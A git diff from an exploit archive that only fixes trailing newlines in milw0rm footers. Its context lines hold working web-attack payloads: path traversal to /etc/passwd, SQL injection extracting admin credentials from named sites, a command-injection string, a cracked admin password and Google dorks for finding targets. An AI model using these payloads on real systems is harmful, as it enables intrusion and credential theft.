can rewrite alle the pages posting a comment like in the "username" or "comment" field. --------------------------------------------------------------- -# milw0rm.com [2007-12-05] +# milw0rm.com [2007-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/4694.txt b/platforms/php/webapps/4694.txt index e9622b784..8129a1a70 100755 --- a/platforms/php/webapps/4694.txt +++ b/platforms/php/webapps/4694.txt @@ -9,4 +9,4 @@ exploit : /ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F google dork : inurl:"index.php?link=" Powered by ezContents Version 1.4.5 thanks to : str0ke, Cr[]w. -# milw0rm.com [2007-12-05] +# milw0rm.com [2007-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/4695.txt b/platforms/php/webapps/4695.txt index 55fa3817b..56b95c972 100755 --- a/platforms/php/webapps/4695.txt +++ b/platforms/php/webapps/4695.txt @@ -11,4 +11,4 @@ In Line 22 : POC : /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00 -# milw0rm.com [2007-12-05] +# milw0rm.com [2007-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/4696.txt b/platforms/php/webapps/4696.txt index e2c2c1b4b..67a146254 100755 --- a/platforms/php/webapps/4696.txt +++ b/platforms/php/webapps/4696.txt @@ -7,4 +7,4 @@ POC: /js/get_js.php?mod=../../../../../../../etc/passwd%00 /js/get_js.php?js=../../../../../../../etc/passwd%00 -# milw0rm.com [2007-12-06] +# milw0rm.com [2007-12-06] \ No newline at end of file diff --git a/platforms/php/webapps/47.c b/platforms/php/webapps/47.c index 967243ee4..93b593ed0 100755 --- a/platforms/php/webapps/47.c +++ b/platforms/php/webapps/47.c @@ -173,4 +173,4 @@ buffer[i + 6] == '>' && buffer[i + 7] == '\n' && showing == 1) return 0; } -// milw0rm.com [2003-06-30] +// milw0rm.com [2003-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/4704.txt b/platforms/php/webapps/4704.txt index 54b000be1..1bbce7caf 100755 --- a/platforms/php/webapps/4704.txt +++ b/platforms/php/webapps/4704.txt @@ -2,4 +2,4 @@ PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerabilit D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272 POC : /download_file.php?filename=../../../../../../../../etc/passwd -# milw0rm.com [2007-12-08] +# milw0rm.com [2007-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/4705.txt b/platforms/php/webapps/4705.txt index f6318643e..6febe460b 100755 --- a/platforms/php/webapps/4705.txt +++ b/platforms/php/webapps/4705.txt @@ -93,4 +93,4 @@ as: Ok, i think that's all :S --------------------------------------------------------------- -# milw0rm.com [2007-12-09] +# milw0rm.com [2007-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/4706.txt b/platforms/php/webapps/4706.txt index c591c3bc9..cc22fb785 100755 --- a/platforms/php/webapps/4706.txt +++ b/platforms/php/webapps/4706.txt @@ -47,4 +47,4 @@ Group Site: wWw.XmorS.CoM --==+ Content Injector V1.53 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-12-09] +# milw0rm.com [2007-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/4707.txt b/platforms/php/webapps/4707.txt index 5cf0c35b4..55e563594 100755 --- a/platforms/php/webapps/4707.txt +++ b/platforms/php/webapps/4707.txt @@ -30,4 +30,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ Ace Image Hosting Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-12-09] +# milw0rm.com [2007-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/4708.txt b/platforms/php/webapps/4708.txt index d6570c822..1fc19ed2f 100755 --- a/platforms/php/webapps/4708.txt +++ b/platforms/php/webapps/4708.txt @@ -26,4 +26,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ DWdirectory 2.1 AND PRIOR SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-12-09] +# milw0rm.com [2007-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/4709.txt b/platforms/php/webapps/4709.txt index 871d827d0..9639fa334 100755 --- a/platforms/php/webapps/4709.txt +++ b/platforms/php/webapps/4709.txt @@ -31,4 +31,4 @@ z4478ad 'admin' is admin user & 'z4478ad' is admin password ------------------------------------- -# milw0rm.com [2007-12-09] +# milw0rm.com [2007-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/4710.txt b/platforms/php/webapps/4710.txt index cdc179b6d..2f9b97544 100755 --- a/platforms/php/webapps/4710.txt +++ b/platforms/php/webapps/4710.txt @@ -10,4 +10,4 @@ Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED' RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';-- -# milw0rm.com [2007-12-10] +# milw0rm.com [2007-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/4711.txt b/platforms/php/webapps/4711.txt index c891816a5..ab9f9be67 100755 --- a/platforms/php/webapps/4711.txt +++ b/platforms/php/webapps/4711.txt @@ -54,4 +54,4 @@ Original Advisory : http://www.h-labs.org/blog/2007/12/05/falt4_cms_secur http://sourceforge.net/projects/falt4/ http://www.h-labs.org -# milw0rm.com [2007-12-10] +# milw0rm.com [2007-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/4712.txt b/platforms/php/webapps/4712.txt index a43d61fc6..f0f583f73 100755 --- a/platforms/php/webapps/4712.txt +++ b/platforms/php/webapps/4712.txt @@ -32,4 +32,4 @@ Simple 1337 Csrf exploit: There is other more csrf and permanent xss.. -# milw0rm.com [2007-12-10] +# milw0rm.com [2007-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/4714.pl b/platforms/php/webapps/4714.pl index 8e84dea87..d3873be08 100755 --- a/platforms/php/webapps/4714.pl +++ b/platforms/php/webapps/4714.pl @@ -176,4 +176,4 @@ print("######################################################################### ); } -# milw0rm.com [2007-12-10] +# milw0rm.com [2007-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/4718.rb b/platforms/php/webapps/4718.rb index 86fc2a7fe..1522dcaaf 100755 --- a/platforms/php/webapps/4718.rb +++ b/platforms/php/webapps/4718.rb @@ -40,4 +40,4 @@ puts 'Code = ' + resp.code resp.each {|key,val| puts key + ' = ' + val} #puts data -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/4719.txt b/platforms/php/webapps/4719.txt index f9352f6ad..efe486be9 100755 --- a/platforms/php/webapps/4719.txt +++ b/platforms/php/webapps/4719.txt @@ -21,4 +21,4 @@ Exploit: http://[site]/modules/cms/index.php?template=[LFI]%00 Vuln Code: include"includes/$template/template.config.php"; --------------------------------------------------------------- -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/4721.txt b/platforms/php/webapps/4721.txt index d2a1f6feb..5cc687cbc 100755 --- a/platforms/php/webapps/4721.txt +++ b/platforms/php/webapps/4721.txt @@ -132,4 +132,4 @@ ChangeLog: - 2007-12-12 * Modify workaround (thanks to Florian Sander for suggestion) -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/4722.txt b/platforms/php/webapps/4722.txt index 73d548208..f611c7941 100755 --- a/platforms/php/webapps/4722.txt +++ b/platforms/php/webapps/4722.txt @@ -18,4 +18,4 @@ My5ql Team Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends # For Contact : RxH@HotMail.iT -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/4725.txt b/platforms/php/webapps/4725.txt index dfe338c40..7c8e8e742 100755 --- a/platforms/php/webapps/4725.txt +++ b/platforms/php/webapps/4725.txt @@ -20,4 +20,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My # For Contact : RxH@HotMail.iT Best Wishes -# milw0rm.com [2007-12-12] +# milw0rm.com [2007-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/4726.txt b/platforms/php/webapps/4726.txt index a6b86c6cf..122cb4183 100755 --- a/platforms/php/webapps/4726.txt +++ b/platforms/php/webapps/4726.txt @@ -20,4 +20,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My # For Contact : RxH@HotMail.iT Best Wishes -# milw0rm.com [2007-12-13] +# milw0rm.com [2007-12-13] \ No newline at end of file diff --git a/platforms/php/webapps/4727.txt b/platforms/php/webapps/4727.txt index f35d221a3..64517a0b7 100755 --- a/platforms/php/webapps/4727.txt +++ b/platforms/php/webapps/4727.txt @@ -29,4 +29,4 @@ #err0r, sick, trintitty, asdfhacks.com , a59, fury, , communized and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-12-13] +# milw0rm.com [2007-12-13] \ No newline at end of file diff --git a/platforms/php/webapps/4728.txt b/platforms/php/webapps/4728.txt index e743ac6c8..4570b3d0c 100755 --- a/platforms/php/webapps/4728.txt +++ b/platforms/php/webapps/4728.txt @@ -4,4 +4,4 @@ POC : /mms_template/get_image.php?id=../../../../../../../../etc/passwd /mms_template/get_file.php?id=../../../../../../../../etc/passwd -# milw0rm.com [2007-12-13] +# milw0rm.com [2007-12-13] \ No newline at end of file diff --git a/platforms/php/webapps/4729.txt b/platforms/php/webapps/4729.txt index 1a7cd4447..bfaba97e3 100755 --- a/platforms/php/webapps/4729.txt +++ b/platforms/php/webapps/4729.txt @@ -4,4 +4,4 @@ POC : /xml2owl-0.1.1/filedownload.php?file=config.inc.php /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd -# milw0rm.com [2007-12-13] +# milw0rm.com [2007-12-13] \ No newline at end of file diff --git a/platforms/php/webapps/4731.php b/platforms/php/webapps/4731.php index e77840ef7..87805fb2f 100755 --- a/platforms/php/webapps/4731.php +++ b/platforms/php/webapps/4731.php @@ -101,4 +101,4 @@ echo "Exploit Has Been Failed!
"; } ?> -# milw0rm.com [2007-12-13] +# milw0rm.com [2007-12-13] \ No newline at end of file diff --git a/platforms/php/webapps/4733.txt b/platforms/php/webapps/4733.txt index 7abcead1f..bd458f2a8 100755 --- a/platforms/php/webapps/4733.txt +++ b/platforms/php/webapps/4733.txt @@ -26,4 +26,4 @@ Interesting sentence, unfortunately for 123tkShop sentences do not defend again Merry Christmas. -# milw0rm.com [2007-12-14] +# milw0rm.com [2007-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/4734.txt b/platforms/php/webapps/4734.txt index 345afc819..b80334abb 100755 --- a/platforms/php/webapps/4734.txt +++ b/platforms/php/webapps/4734.txt @@ -13,4 +13,4 @@ Anon Proxy Server forces magic_quotes_gpc=on, However magic_quotes_gpc does not Peace -# milw0rm.com [2007-12-14] +# milw0rm.com [2007-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/4735.txt b/platforms/php/webapps/4735.txt index e1dad8a67..09c38e4bd 100755 --- a/platforms/php/webapps/4735.txt +++ b/platforms/php/webapps/4735.txt @@ -27,4 +27,4 @@ However magic_quotes_gpc is require for LFI because you need a null byte. Peace -# milw0rm.com [2007-12-14] +# milw0rm.com [2007-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/4736.txt b/platforms/php/webapps/4736.txt index 9e2d36782..3b4d75763 100755 --- a/platforms/php/webapps/4736.txt +++ b/platforms/php/webapps/4736.txt @@ -30,4 +30,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends # For Contact : RxH@HotMail.iT Best Wishes -# milw0rm.com [2007-12-14] +# milw0rm.com [2007-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/4737.txt b/platforms/php/webapps/4737.txt index d0db2ca6d..b470e9850 100755 --- a/platforms/php/webapps/4737.txt +++ b/platforms/php/webapps/4737.txt @@ -28,4 +28,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ PHP Real Estate SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2007-12-14] +# milw0rm.com [2007-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/4738.txt b/platforms/php/webapps/4738.txt index bed37fd60..3b6f6726d 100755 --- a/platforms/php/webapps/4738.txt +++ b/platforms/php/webapps/4738.txt @@ -43,4 +43,4 @@ Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4739.pl b/platforms/php/webapps/4739.pl index f87dafa50..6b8eb6d3e 100755 --- a/platforms/php/webapps/4739.pl +++ b/platforms/php/webapps/4739.pl @@ -133,4 +133,4 @@ sub istrue2 } } -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4740.pl b/platforms/php/webapps/4740.pl index 4d6653841..a6896bfcb 100755 --- a/platforms/php/webapps/4740.pl +++ b/platforms/php/webapps/4740.pl @@ -134,4 +134,4 @@ sub istrue2 } } -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4741.txt b/platforms/php/webapps/4741.txt index 2e3afc862..54e5a77a5 100755 --- a/platforms/php/webapps/4741.txt +++ b/platforms/php/webapps/4741.txt @@ -30,4 +30,4 @@ Creditz to breaker_unit, h4cky0u.org and str0ke! Don is wishing Happy Holidays to all of you reading this! Cheers! -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4743.pl b/platforms/php/webapps/4743.pl index 565e58cd5..fe6769a39 100755 --- a/platforms/php/webapps/4743.pl +++ b/platforms/php/webapps/4743.pl @@ -53,4 +53,4 @@ else {print "\n [-] Gagal :( , Coba yang lain!";} # ----------------------------[Selesai]------------------------------------ -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4750.txt b/platforms/php/webapps/4750.txt index 327c6e085..4eaf339e9 100755 --- a/platforms/php/webapps/4750.txt +++ b/platforms/php/webapps/4750.txt @@ -32,4 +32,4 @@ # Contact: K0ller (at) hotmail (dot) CoM -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4753.txt b/platforms/php/webapps/4753.txt index 4965cb9ca..7bc6a0a03 100755 --- a/platforms/php/webapps/4753.txt +++ b/platforms/php/webapps/4753.txt @@ -36,4 +36,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends # For Contact : RxH@HotMail.iT Best Wishes -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4755.txt b/platforms/php/webapps/4755.txt index 920f06a3f..e8784edf7 100755 --- a/platforms/php/webapps/4755.txt +++ b/platforms/php/webapps/4755.txt @@ -26,4 +26,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends Happy Aid All Muslims Best Wishes -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/4758.txt b/platforms/php/webapps/4758.txt index de6f64a43..d78492679 100755 --- a/platforms/php/webapps/4758.txt +++ b/platforms/php/webapps/4758.txt @@ -9,4 +9,4 @@ exploit : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fe google dork : inurl:"view.php?list=" Powered by xeCMS thanks to : str0ke, Cr[]w. -# milw0rm.com [2007-12-19] +# milw0rm.com [2007-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/4762.txt b/platforms/php/webapps/4762.txt index f1cf908c7..3de78434c 100755 --- a/platforms/php/webapps/4762.txt +++ b/platforms/php/webapps/4762.txt @@ -24,4 +24,4 @@ Date : 21/12/2007 And then we'll get the username and the hash of the admin. -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4764.txt b/platforms/php/webapps/4764.txt index ec966ed27..a16020fdd 100755 --- a/platforms/php/webapps/4764.txt +++ b/platforms/php/webapps/4764.txt @@ -24,4 +24,4 @@ Exploit : http://localsite/path/admin/frontpage_right.php?loadadminpage=[File] ========================================================= -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4765.txt b/platforms/php/webapps/4765.txt index c3e5559ad..c401d3364 100755 --- a/platforms/php/webapps/4765.txt +++ b/platforms/php/webapps/4765.txt @@ -56,4 +56,4 @@ http://[site]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../../../../../boot.ini%00 http://[site]/[path]/pages/download/default/ops/search.php?theme_dir=../../../../../../../../../boot.ini%00 -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4766.txt b/platforms/php/webapps/4766.txt index e06b2016c..ec4701abb 100755 --- a/platforms/php/webapps/4766.txt +++ b/platforms/php/webapps/4766.txt @@ -53,4 +53,4 @@ file disclosure in $page :* http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00 http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00 -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4767.txt b/platforms/php/webapps/4767.txt index 87f5e8962..161b7ae98 100755 --- a/platforms/php/webapps/4767.txt +++ b/platforms/php/webapps/4767.txt @@ -24,4 +24,4 @@ Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00 Exploit: http://[site]/header_group.php?global_lang=[LFI]%00 --------------------------------------------------------------- -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4768.py b/platforms/php/webapps/4768.py index ec8f47873..b33fca2db 100755 --- a/platforms/php/webapps/4768.py +++ b/platforms/php/webapps/4768.py @@ -377,4 +377,4 @@ print "[+]Done." print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%sigotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path) -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4769.txt b/platforms/php/webapps/4769.txt index 0314e0d17..e23d29419 100755 --- a/platforms/php/webapps/4769.txt +++ b/platforms/php/webapps/4769.txt @@ -119,4 +119,4 @@ Use this exploit at your own risk. You are responsible for your own deeds. ------------------------------------------------------------------------------------------------ Use your brain, do not lame. Enjoy. =) -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/4770.txt b/platforms/php/webapps/4770.txt index 062938073..1500631e6 100755 --- a/platforms/php/webapps/4770.txt +++ b/platforms/php/webapps/4770.txt @@ -31,4 +31,4 @@ # # Contact: K0ller (at) hotmail (dot) CoM -# milw0rm.com [2007-12-22] +# milw0rm.com [2007-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/4771.txt b/platforms/php/webapps/4771.txt index bf96a0abd..3edf2ee4e 100755 --- a/platforms/php/webapps/4771.txt +++ b/platforms/php/webapps/4771.txt @@ -39,4 +39,4 @@ There is other more sql injection. For get user, password and status of the members, u must edit [UserID] whit number.. The number 1 it's the default id of the admin. --------------------------------------------------------------- -# milw0rm.com [2007-12-22] +# milw0rm.com [2007-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/4772.txt b/platforms/php/webapps/4772.txt index 38e676d38..f20a40bd7 100755 --- a/platforms/php/webapps/4772.txt +++ b/platforms/php/webapps/4772.txt @@ -41,4 +41,4 @@ account admin with password md5 cracked user >> Selim pass >> 6a81060b83b919bc115112bf840eca63 = miles -# milw0rm.com [2007-12-22] +# milw0rm.com [2007-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/4774.pl b/platforms/php/webapps/4774.pl index 1b4d1c57d..a2e73429a 100755 --- a/platforms/php/webapps/4774.pl +++ b/platforms/php/webapps/4774.pl @@ -105,4 +105,4 @@ sub exploit } } -# milw0rm.com [2007-12-23] +# milw0rm.com [2007-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/4775.txt b/platforms/php/webapps/4775.txt index 1d25077e9..1b8a05237 100755 --- a/platforms/php/webapps/4775.txt +++ b/platforms/php/webapps/4775.txt @@ -33,4 +33,4 @@ Tested on the official demo site http://adultscript.net/demo/ and it work very g --------------------------------------------------------------- -# milw0rm.com [2007-12-23] +# milw0rm.com [2007-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/4776.txt b/platforms/php/webapps/4776.txt index 579ea8c7e..6750f3d0f 100755 --- a/platforms/php/webapps/4776.txt +++ b/platforms/php/webapps/4776.txt @@ -10,4 +10,4 @@ Example: http://www.brand039.com/default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1/* -# milw0rm.com [2007-12-23] +# milw0rm.com [2007-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/4777.txt b/platforms/php/webapps/4777.txt index d363e5ee3..e93be465c 100755 --- a/platforms/php/webapps/4777.txt +++ b/platforms/php/webapps/4777.txt @@ -30,4 +30,4 @@ http://[target]/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kulla < / ----------------------------------------------------------------------------- /> -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4778.txt b/platforms/php/webapps/4778.txt index 0856179c2..bd43c7e75 100755 --- a/platforms/php/webapps/4778.txt +++ b/platforms/php/webapps/4778.txt @@ -48,4 +48,4 @@ Bye.. visit http://www.inj3ct-it.org !! --------------------------------------------------------------- -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4779.php b/platforms/php/webapps/4779.php index 08c651f3c..8e5483570 100755 --- a/platforms/php/webapps/4779.php +++ b/platforms/php/webapps/4779.php @@ -284,4 +284,4 @@ function xecho($line, $both = 0) ///////////////////////////////////////////////////////////////////// ?> -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4780.txt b/platforms/php/webapps/4780.txt index 1680fb340..57b6dc12a 100755 --- a/platforms/php/webapps/4780.txt +++ b/platforms/php/webapps/4780.txt @@ -24,4 +24,4 @@ # Contact: K0ller (at) hotmail (dot) CoM -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4781.php b/platforms/php/webapps/4781.php index e6bd6b2b4..2725a358d 100755 --- a/platforms/php/webapps/4781.php +++ b/platforms/php/webapps/4781.php @@ -119,4 +119,4 @@ if(isset($_POST['start'])) } ?> -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4782.txt b/platforms/php/webapps/4782.txt index dc32acad3..be4f9cce3 100755 --- a/platforms/php/webapps/4782.txt +++ b/platforms/php/webapps/4782.txt @@ -35,4 +35,4 @@ http://[site]/admin/frontpage_right.php?loadadminpage=[Evil_Code] --------------------------------------------------------------- -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4783.txt b/platforms/php/webapps/4783.txt index 32e23fedb..e136509a8 100755 --- a/platforms/php/webapps/4783.txt +++ b/platforms/php/webapps/4783.txt @@ -22,4 +22,4 @@ by: ShockShadow Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye AND ALL Yee7.com members -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/4785.txt b/platforms/php/webapps/4785.txt index 48057b39f..f9bd3727e 100755 --- a/platforms/php/webapps/4785.txt +++ b/platforms/php/webapps/4785.txt @@ -44,4 +44,4 @@ Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a SP.Thanx To : Tryag.Com/cc [Tryag-Team] -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4786.pl b/platforms/php/webapps/4786.pl index dfb821af6..eca2f41f9 100755 --- a/platforms/php/webapps/4786.pl +++ b/platforms/php/webapps/4786.pl @@ -179,4 +179,4 @@ sub buatadmin () die "- Exploit Gagal\r\n"; } -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4787.pl b/platforms/php/webapps/4787.pl index e477b954a..75a54ca42 100755 --- a/platforms/php/webapps/4787.pl +++ b/platforms/php/webapps/4787.pl @@ -209,4 +209,4 @@ sub usage exit(); } -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4788.txt b/platforms/php/webapps/4788.txt index 35a92eaf3..d882fe40f 100755 --- a/platforms/php/webapps/4788.txt +++ b/platforms/php/webapps/4788.txt @@ -34,4 +34,4 @@ Bye.. and visit http://www.inj3ct-it.org !! --------------------------------------------------------------- -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4789.php b/platforms/php/webapps/4789.php index a38538163..41c885ef2 100755 --- a/platforms/php/webapps/4789.php +++ b/platforms/php/webapps/4789.php @@ -129,4 +129,4 @@ while(1) ?> -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4790.txt b/platforms/php/webapps/4790.txt index 6a67e6a47..e198015cb 100755 --- a/platforms/php/webapps/4790.txt +++ b/platforms/php/webapps/4790.txt @@ -173,4 +173,4 @@ with vulnerability reports, advisories and whitepapers posted regularly on our w Contact: research@dsec.ru http://www.dsec.ru (in Russian) -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4791.txt b/platforms/php/webapps/4791.txt index 15cb9f496..7b1e02bd2 100755 --- a/platforms/php/webapps/4791.txt +++ b/platforms/php/webapps/4791.txt @@ -30,4 +30,4 @@ details..: works with magic_quotes_gpc = off http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/* -# milw0rm.com [2007-12-25] +# milw0rm.com [2007-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/4792.pl b/platforms/php/webapps/4792.pl index f370f80e6..468a11aed 100755 --- a/platforms/php/webapps/4792.pl +++ b/platforms/php/webapps/4792.pl @@ -190,4 +190,4 @@ sub usage exit(); } -# milw0rm.com [2007-12-26] +# milw0rm.com [2007-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/4793.txt b/platforms/php/webapps/4793.txt index 8d10e8b01..3cb8bd131 100755 --- a/platforms/php/webapps/4793.txt +++ b/platforms/php/webapps/4793.txt @@ -54,4 +54,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2007-12-26] +# milw0rm.com [2007-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/4794.pl b/platforms/php/webapps/4794.pl index 56041523d..24eb49e9e 100755 --- a/platforms/php/webapps/4794.pl +++ b/platforms/php/webapps/4794.pl @@ -126,4 +126,4 @@ while($cmd !~ "q") { $cmd = ; } -# milw0rm.com [2007-12-26] +# milw0rm.com [2007-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/4795.txt b/platforms/php/webapps/4795.txt index 9dcb30eb8..6ff5b822b 100755 --- a/platforms/php/webapps/4795.txt +++ b/platforms/php/webapps/4795.txt @@ -12,4 +12,4 @@ # meri crismas...hohoho # greetz to all RST [rstzone.org] MEMBERZ ! -# milw0rm.com [2007-12-26] +# milw0rm.com [2007-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/4796.txt b/platforms/php/webapps/4796.txt index c85fbd5ff..80163de71 100755 --- a/platforms/php/webapps/4796.txt +++ b/platforms/php/webapps/4796.txt @@ -28,4 +28,4 @@ http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=[ LFI ] -# milw0rm.com [2007-12-26] +# milw0rm.com [2007-12-26] \ No newline at end of file diff --git a/platforms/php/webapps/4798.php b/platforms/php/webapps/4798.php index d94e6da02..e4a047fb6 100755 --- a/platforms/php/webapps/4798.php +++ b/platforms/php/webapps/4798.php @@ -149,4 +149,4 @@ print "\n\n[-] Successfull!\n"; ?> -# milw0rm.com [2007-12-27] +# milw0rm.com [2007-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/4799.txt b/platforms/php/webapps/4799.txt index f090ac754..ed914203c 100755 --- a/platforms/php/webapps/4799.txt +++ b/platforms/php/webapps/4799.txt @@ -12,4 +12,4 @@ demo http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE dork: powered by joovili -# milw0rm.com [2007-12-27] +# milw0rm.com [2007-12-27] \ No newline at end of file diff --git a/platforms/php/webapps/4800.txt b/platforms/php/webapps/4800.txt index 3756da240..885e315da 100755 --- a/platforms/php/webapps/4800.txt +++ b/platforms/php/webapps/4800.txt @@ -52,4 +52,4 @@ Type http://www.site.com/showCode.php?path=;uname -a --------------------------------------------------------------- -# 